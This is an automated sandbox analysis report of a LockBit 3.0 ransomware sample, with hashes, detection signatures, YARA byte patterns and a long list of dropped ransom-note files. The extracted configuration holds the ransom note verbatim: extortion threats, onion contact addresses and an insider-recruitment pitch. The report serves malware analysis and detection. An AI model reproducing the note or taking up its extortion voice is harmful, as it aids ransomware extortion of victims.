Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:732631
MD5:4e52098915028fb63cf4f1205a1730fa
SHA1:719b2a14e70d2913fd4ec4c403a586741fe64a10
SHA256:367f5b45da98215ff297e0856e4a961c9e831e4f06457f16453f60d0cf407449
Tags:exe
Infos:

Detection

LockBit ransomware
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected LockBit ransomware
Malicious sample detected (through community Yara rule)
Found ransom note / readme
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found Tor onion address
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Writes many files with high entropy
Writes a notice file (html or txt) to demand a ransom
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Contains functionality to clear windows event logs (to hide its activities)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
PE file contains an invalid checksum
Enables security privileges
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5216 cmdline: C:\Users\user\Desktop\file.exe MD5: 4E52098915028FB63CF4F1205A1730FA)
    • splwow64.exe (PID: 4936 cmdline: C:\Windows\splwow64.exe 12288 MD5: 8D59B31FF375059E3C32B17BF31A76D5)
  • cleanup

Malware Configuration

Threatname: Lockbit

{"URL": "http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion", "Ransom Note": "\r\n            ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~\r\n\r\n>>>> Your data are stolen and encrypted\r\n\r\n\tThe data will be published on TOR website if you do not pay the ransom \r\n\r\n\tLinks for Tor Browser:\r\n\thttp://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion\r\n\thttp://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion\r\n\thttp://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion\r\n\thttp://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion\r\n\thttp://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion\r\n\thttp://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion\r\n\thttp://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion\r\n\thttp://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion\r\n\thttp://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion\r\n\r\n\tLinks for the normal browser\r\n\thttp://lockbitapt.uz\r\n\thttp://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly\r\n\thttp://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion.ly\r\n\thttp://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion.ly\r\n\thttp://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion.ly\r\n\thttp://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion.ly\r\n\thttp://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion.ly\r\n\thttp://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion.ly\r\n\thttp://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion.ly\r\n\thttp://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.ly\r\n\r\n\r\n>>>> What guarantees that we will not deceive you? \r\n\r\n\tWe are not a politically motivated group and we do not need anything other than your money. \r\n    \r\n\tIf you pay, we will provide you the programs for decryption and we will delete your data. \r\n\tLife is too short to be sad. Be not sad, money, it is only paper.\r\n    \r\n\tIf we do not give you decrypters, or we do not delete your data after payment, then nobody will pay us in the future. \r\n\tTherefore to us our reputation is very important. We attack the companies worldwide and there is no dissatisfied victim after payment.\r\n    \r\n\tYou can obtain information about us on twitter https://twitter.com/hashtag/lockbit?f=live\r\n    \r\n\r\n>>>> You need contact us and decrypt one file for free on these TOR sites with your personal DECRYPTION ID\r\n\r\n\tDownload and install TOR Browser https://www.torproject.org/\r\n\tWrite to a chat and wait for the answer, we will always answer you. \r\n\tSometimes you will need to wait for our answer because we attack many companies.\r\n\t\r\n\tLinks for Tor Browser:\r\n\thttp://lockbitsupt7nr3fa6e7xyb73lk6bw6rcneqhoyblniiabj4uwvzapqd.onion\r\n\thttp://lockbitsupuhswh4izvoucoxsbnotkmgq6durg7kficg6u33zfvq3oyd.onion\r\n\thttp://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44633hnzzmtxdvjoqlp7yd.onion\r\n\r\n\tLink for the normal browser\r\n\thttp://lockbitsupp.uz\r\n\t\r\n\tIf you do not get an answer in the chat room for a long time, the site does not work and in any other emergency, you can contact us in jabber or tox.\r\n\t\r\n\tTox ID LockBitSupp: 3085B89A0C515D2FB124D645906F5D3DA5CB97CEBEA975959AE4F95302A04E1D709C3C4AE9B7\r\n\tXMPP (Jabber) Support: 598954663666452@exploit.im 365473292355268@thesecure.biz\r\n\t\r\n>>>> Your personal DECRYPTION ID: 4B54F00988F20AA67F36E73B2C690276\r\n\r\n>>>> Warning! Do not DELETE or MODIFY any files, it can lead to recovery problems!\r\n\r\n>>>> Warning! If you do not pay the ransom we will attack your company repeatedly again!\r\n\r\n\r\n>>>> Advertisement\r\n\t\r\n\tWould you like to earn millions of dollars $$$ ?\r\n\r\n\tOur company acquire access to networks of various companies, as well as insider information that can help you steal the most valuable data of any company. \r\n\tYou can provide us accounting data for the access to any company, for example, login and password to RDP, VPN, corporate email, etc. \r\n\tOpen our letter at your email. Launch the provided virus on any computer in your company.\r\n\r\n\tYou can do it both using your work computer or the computer of any other employee in order to divert suspicion of being in collusion with us.\r\n\r\n\tCompanies pay us the foreclosure for the decryption of files and prevention of data leak.\r\n\r\n\tYou can contact us using Tox messenger without registration and SMS https://tox.chat/download.html. \r\n\tUsing Tox messenger, we will never know your real name, it means your privacy is guaranteed.\r\n\r\n\tIf you want to contact us, write in jabber or tox. \r\n\t\r\n\tTox ID LockBitSupp: 3085B89A0C515D2FB124D645906F5D3DA5CB97CEBEA975959AE4F95302A04E1D709C3C4AE9B7\r\n\tXMPP (Jabber) Support: 598954663666452@exploit.im 365473292355268@thesecure.biz\r\n\t\r\n\tIf this contact is expired, and we do not respond you, look for the relevant contact data on our website via Tor or Brave browser \r\n\t\r\n\tLinks for Tor Browser:\r\n\thttp://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion\r\n\thttp://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion\r\n\thttp://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion\r\n\thttp://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion\r\n\thttp://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion\r\n\thttp://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion\r\n\thttp://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion\r\n\thttp://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion\r\n\thttp://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion\r\n\r\n\t\r\n\tLinks for the normal browser\r\n\thttp://lockbitapt.uz\r\n\thttp://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly\r\n\thttp://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion.ly\r\n\thttp://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion.ly\r\n\thttp://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion.ly\r\n\thttp://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion.ly\r\n\thttp://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion.ly\r\n\thttp://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion.ly\r\n\thttp://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion.ly\r\n\thttp://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.ly"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
file.exeWindows_Ransomware_Lockbit_369e1e94unknownunknown
  • 0x1861d:$a2: 8B EC 53 56 57 33 C0 8B 5D 14 33 C9 33 D2 8B 75 0C 8B 7D 08 85 F6 74 33 55 8B 6D 10 8A 54 0D 00 02 D3 8A 5C 15 00 8A 54 1D 00
  • 0x4d4:$a3: 53 51 6A 01 58 0F A2 F7 C1 00 00 00 40 0F 95 C0 84 C0 74 09 0F C7 F0 0F C7 F2 59 5B C3 6A 07 58 33 C9 0F A2 F7 C3 00 00 04 00 0F 95 C0 84 C0 74 09 0F C7 F8 0F C7 FA 59 5B C3 0F 31 8B C8 C1 C9 ...

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.348122024.00000000008E5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LockBit_ransomwareYara detected LockBit ransomwareJoe Security
    00000000.00000003.351537079.00000000008CD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LockBit_ransomwareYara detected LockBit ransomwareJoe Security
      00000000.00000003.340156127.00000000008CD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LockBit_ransomwareYara detected LockBit ransomwareJoe Security
        00000000.00000003.348024418.00000000008E5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LockBit_ransomwareYara detected LockBit ransomwareJoe Security
          00000000.00000003.292192937.00000000008DA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LockBit_ransomwareYara detected LockBit ransomwareJoe Security
            Click to see the 126 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.3.file.exe.95ad4c.0.raw.unpackWindows_Ransomware_Lockbit_369e1e94unknownunknown
            • 0x1861d:$a2: 8B EC 53 56 57 33 C0 8B 5D 14 33 C9 33 D2 8B 75 0C 8B 7D 08 85 F6 74 33 55 8B 6D 10 8A 54 0D 00 02 D3 8A 5C 15 00 8A 54 1D 00
            • 0x4d4:$a3: 53 51 6A 01 58 0F A2 F7 C1 00 00 00 40 0F 95 C0 84 C0 74 09 0F C7 F0 0F C7 F2 59 5B C3 6A 07 58 33 C9 0F A2 F7 C3 00 00 04 00 0F 95 C0 84 C0 74 09 0F C7 F8 0F C7 FA 59 5B C3 0F 31 8B C8 C1 C9 ...
            0.0.file.exe.d00000.0.unpackWindows_Ransomware_Lockbit_369e1e94unknownunknown
            • 0x1861d:$a2: 8B EC 53 56 57 33 C0 8B 5D 14 33 C9 33 D2 8B 75 0C 8B 7D 08 85 F6 74 33 55 8B 6D 10 8A 54 0D 00 02 D3 8A 5C 15 00 8A 54 1D 00
            • 0x4d4:$a3: 53 51 6A 01 58 0F A2 F7 C1 00 00 00 40 0F 95 C0 84 C0 74 09 0F C7 F0 0F C7 F2 59 5B C3 6A 07 58 33 C9 0F A2 F7 C3 00 00 04 00 0F 95 C0 84 C0 74 09 0F C7 F8 0F C7 FA 59 5B C3 0F 31 8B C8 C1 C9 ...
            0.2.file.exe.d00000.0.unpackWindows_Ransomware_Lockbit_369e1e94unknownunknown
            • 0x1861d:$a2: 8B EC 53 56 57 33 C0 8B 5D 14 33 C9 33 D2 8B 75 0C 8B 7D 08 85 F6 74 33 55 8B 6D 10 8A 54 0D 00 02 D3 8A 5C 15 00 8A 54 1D 00
            • 0x4d4:$a3: 53 51 6A 01 58 0F A2 F7 C1 00 00 00 40 0F 95 C0 84 C0 74 09 0F C7 F0 0F C7 F2 59 5B C3 6A 07 58 33 C9 0F A2 F7 C3 00 00 04 00 0F 95 C0 84 C0 74 09 0F C7 F8 0F C7 FA 59 5B C3 0F 31 8B C8 C1 C9 ...

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: file.exeReversingLabs: Detection: 78%
            Antivirus / Scanner detection for submitted sample
            Source: file.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onionAvira URL Cloud: Label: malware
            Source: http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion.lyAvira URL Cloud: Label: malware
            Source: http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onionAvira URL Cloud: Label: malware
            Machine Learning detection for sample
            Source: file.exeJoe Sandbox ML: detected
            Source: 0.3.file.exe.95ad4c.0.unpackAvira: Label: TR/Patched.Ren.Gen
            Source: 0.2.file.exe.d00000.0.unpackAvira: Label: BDS/ZeroAccess.Gen7
            Source: 0.0.file.exe.d00000.0.unpackAvira: Label: BDS/ZeroAccess.Gen7
            Source: g0sOhfQ0Z.README.txt176.0.drMalware Configuration Extractor: Lockbit {"URL": "http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion", "Ransom Note": "\r\n ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~\r\n\r\n>>>> Your data are stolen and encrypted\r\n\r\n\tThe data will be published on TOR website if you do not pay the ransom \r\n\r\n\tLinks for Tor Browser:\r\n\thttp://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion\r\n\thttp://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion\r\n\thttp://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion\r\n\thttp://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion\r\n\thttp://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion\r\n\thttp://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion\r\n\thttp://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion\r\n\thttp://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion\r\n\thttp://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion\r\n\r\n\tLinks for the normal browser\r\n\thttp://lockbitapt.uz\r\n\thttp://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly\r\n\thttp://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion.ly\r\n\thttp://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion.ly\r\n\thttp://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion.ly\r\n\thttp://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion.ly\r\n\thttp://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion.ly\r\n\thttp://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion.ly\r\n\thttp://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion.ly\r\n\thttp://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.ly\r\n\r\n\r\n>>>> What guarantees that we will not deceive you? \r\n\r\n\tWe are not a politically motivated group and we do not need anything other than your money. \r\n \r\n\tIf you pay, we will provide you the programs for decryption and we will delete your data. \r\n\tLife is too short to be sad. Be not sad, money, it is only paper.\r\n \r\n\tIf we do not give you decrypters, or we do not delete your data after payment, then nobody will pay us in the future. \r\n\tTherefore to us our reputation is very important. We attack the companies worldwide and there is no dissatisfied victim after payment.\r\n \r\n\tYou can obtain information about us on twitter https://twitter.com/hashtag/lockbit?f=live\r\n \r\n\r\n>>>> You need contact us and decrypt one file for free on these TOR sites with your personal DECRYPTION ID\r\n\r\n\tDownload and install TOR Browser https://www.torproject.org/\r\n\tWrite to a chat and wait for the answer, we will always answer you. \r\n\tSometimes you will need to wait for our answer because we attack many companies.\r\n\t\r\n\tLinks for Tor Browser:\r\n\thttp://lockbitsupt7nr3fa6e7xyb73lk6bw6rcneqhoyblniiabj4uwvzapqd.onion\r\n\thttp://lockbitsupuhswh4izvoucoxsbnot
            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\file.exeFile created: C:\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Videos\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Searches\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Saved Games\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Recent\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Pictures\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Pictures\Camera Roll\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\OneDrive\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Music\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Links\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Favorites\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Favorites\Links\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Downloads\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Documents\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Documents\WSHEJMDVQC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Documents\WDBWCPEFJW\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Documents\VWDFPKGDUF\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Documents\OVWVVIANZH\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Documents\LHEPQPGEWF\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Documents\GNLQNHOLWB\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Documents\BXAJUJAOEO\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Documents\BUFZSQPCOH\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Documents\AQRFEVRTGL\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Desktop\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Desktop\WSHEJMDVQC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Desktop\WDBWCPEFJW\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Desktop\VWDFPKGDUF\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Desktop\OVWVVIANZH\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Desktop\LHEPQPGEWF\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Desktop\HMPPSXQPQV\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Desktop\GNLQNHOLWB\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Desktop\BXAJUJAOEO\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Desktop\BUFZSQPCOH\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Contacts\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Adobe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Adobe\LogTransport2\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Linguistics\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Headlights\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Flash Player\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Flash Player\NativeCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Forms\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Collab\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\Linguistics\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cookie\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\85f6be3a-85b2-4564-81df-36c7f7b33e36\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\Acrobat\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\Reader\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\Reader\DesktopNotification\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\Reader\DesktopNotification\NotificationsDB\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\assets\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\VirtualStore\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Publishers\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\SettingsContainer\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\Microsoft.WindowsAlarms\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\Licenses\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\Fonts\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\PeerDistRepub\g0sOhfQ0Z.README.txtJump to behavior
